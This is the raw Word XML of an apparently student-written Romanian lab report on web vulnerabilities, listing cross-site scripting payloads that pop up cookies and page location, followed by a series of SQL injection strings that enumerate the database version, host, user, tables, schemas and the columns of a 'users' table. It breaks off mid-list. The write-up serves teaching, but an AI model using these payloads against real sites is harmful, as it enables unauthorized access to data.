        <w:t>Mesaj &lt;b onmouseover=alert(document.cookie)&gt;click me!&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D51003">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>se foloseste de obiectul "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D51003">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t>". Acesta afiseaza continutul cookie-urilor locale ale sesiunii in pop-up. In acest caz se observa nivelul setat de vulnerabilitate a site-ului.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC2004" w14:textId="229EB480" w:rsidR="00C6492F" w:rsidRDefault="00C6492F" w:rsidP="00C6492F"/>
    <w:p w14:paraId="7EDE4985" w14:textId="1D6DFD46" w:rsidR="00C6492F" w:rsidRDefault="00C6492F" w:rsidP="00C6492F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6492F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;b onmouseover=alert(window.location.href)&gt;click me!&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6492F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>afiseaza adresa web curenta folosindu-se de proprietatea "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6492F">
        <w:t>window.location.href</w:t>
      </w:r>
      <w:r>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E489E7C" w14:textId="222691EC" w:rsidR="00C6492F" w:rsidRDefault="00C6492F" w:rsidP="00C6492F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6492F">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A32C305" wp14:editId="128EC349">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>231140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3277235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21470"/>
                <wp:lineTo x="21531" y="21470"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="48487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7941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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEEBF3E" w14:textId="4550F28A" w:rsidR="00AE5AA4" w:rsidRDefault="00C6492F" w:rsidP="00AE5AA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6492F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;b onmouseover=alert(window.location.port)&gt;click me!&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6492F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>va afisa, folosindu-se de proprietatea "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6492F">
        <w:t xml:space="preserve">window.location.port </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">", port-ul utilzat in conectarea cu pagina web actuala. Daca pagina foloseste un port implicit (:80 sau :443) va returna un string gol. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCE872" w14:textId="0151CE67" w:rsidR="00AE5AA4" w:rsidRDefault="00AE5AA4" w:rsidP="00AE5AA4">
      <w:r>
        <w:t xml:space="preserve">Pagina prezinta, de asemenea, codul sursa a metodei "GET". Se poate observa cel mai vulnerabil si cel mai eficient (din punct de vedere al securitatii) cod. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40150E43" w14:textId="63ECBCB2" w:rsidR="00AE5AA4" w:rsidRDefault="00AE5AA4" w:rsidP="00AE5AA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202D0DE5" wp14:editId="4D75678E">
            <wp:extent cx="5943600" cy="4127500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="559249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127500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="418FA4E0" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="451B1DB4" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="4E60B4C6" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="04EF7373" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="598CC1FA" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="2E56322B" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="21753A8F" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="1F59A1DB" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="28747832" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="0B17E0F8" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00AE5AA4"/>
    <w:p w14:paraId="1D3D4FA1" w14:textId="3E79A5C9" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00E61247">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executare comenzi vulnerabile SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D94F80" w14:textId="77777777" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00E61247"/>
    <w:p w14:paraId="1E9A7EB6" w14:textId="7430429C" w:rsidR="00E61247" w:rsidRPr="00E61247" w:rsidRDefault="00E61247" w:rsidP="00E61247">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E61247">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F3AB3C4" wp14:editId="56A7A6B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>750793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21477"/>
                <wp:lineTo x="21531" y="21477"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="105081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65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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1``</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:t xml:space="preserve">dauga </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' OR 1='1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:t>la o valoare utilizata intr-o interogare SQL, fortand interogarea sa returneze toate randurile din baza de date.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dat fiind faptul ca partea de injectare 1=1 este intotdeauna adevarata, se va returna mereu cel putin un rand. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B70D1AE" w14:textId="45CC7B7C" w:rsidR="00E61247" w:rsidRDefault="00E61247" w:rsidP="00E61247"/>
    <w:p w14:paraId="6F5EBFDA" w14:textId="49E242BD" w:rsidR="00B826C3" w:rsidRDefault="00E61247" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%' or '1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61247">
        <w:t>returneaza toate secventele</w:t>
      </w:r>
      <w:r w:rsidR="00B826C3">
        <w:t xml:space="preserve"> din baza de date (ex. primul cod),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dat fiind faptul ca acel caracter % este un wildcard care se potriveste cu toate caracterele</w:t>
      </w:r>
      <w:r w:rsidR="00B826C3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32123395" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C339B15" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659C0228" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CF7798" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192D428E" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CC1760" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680278A3" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053E872B" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46748137" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AE1132" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04DC1E82" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709D9AF5" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0900708A" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62060776" w14:textId="77777777" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3"/>
    <w:p w14:paraId="10F61651" w14:textId="79B89AE3" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00B826C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>masterutm'union select null, version()#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B826C3">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unde </w:t>
      </w:r>
      <w:r w:rsidRPr="00B826C3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>masterutm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> poate fi utilizatorul valid) returneaza versiunea bazei de date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC2E529" w14:textId="3C73CAAE" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00B826C3">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CF58B58" wp14:editId="2EDAF9DB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>184150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3310255"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21505"/>
                <wp:lineTo x="21531" y="21505"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="166983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3644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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61952751" w14:textId="0A496351" w:rsidR="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0524EB" w14:textId="381EFEFD" w:rsidR="00E61247" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00B826C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'union select null, @@hostname#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>returneaza device-ul host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2375997B" w14:textId="25C85E3F" w:rsidR="00B826C3" w:rsidRPr="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00B826C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>masterutm ' union select null, user() #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>returneaza user-ul server-ului.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A42EC7E" w14:textId="5A68F8B7" w:rsidR="00B826C3" w:rsidRPr="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00B826C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>masterutm' union select null, database() #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>returneaza baza de date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76762366" w14:textId="7319E2B2" w:rsidR="00B826C3" w:rsidRPr="00B826C3" w:rsidRDefault="00B826C3" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00B826C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>masterutm ' and 1=0 union select null, table_name from information_schema.tables #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>returneaza lista cu toate tabelele din baza de date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F66CB" w14:textId="6FC66716" w:rsidR="00B826C3" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D669A4">
        <w:t>Codul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D669A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>masterutm' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D669A4">
        <w:t>returneaza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> toate numele coloanelor in tabelul "users".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5FA379" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B992FAC" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9D1210" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623BD43C" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F76854" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20605681" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFF3BE2" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE88A78" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47739630" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5115FA79" w14:textId="093D2684" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00B826C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D669A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="358F4666" wp14:editId="3A499CE8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>581957</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3271520"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21508"/>
                <wp:lineTo x="21531" y="21508"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="13506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26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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00D669A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin' union select 1,group_concat(0x7c,schema_name,0x7c) from information_schema.schemata -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>returneaza un sir cu numele schemelor din baza de date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74985A25" w14:textId="164E3295" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C606C5" w14:textId="17E34844" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D669A4">
        <w:t>Codul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D669A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name='users'-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D669A4">
        <w:t>returneaza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un sir cu numele coloanelor din tabelul "users".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32805E90" w14:textId="7DB4666C" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59627DC9" w14:textId="1A52470A" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D669A4">
        <w:t>Codul</w:t>
      </w:r>
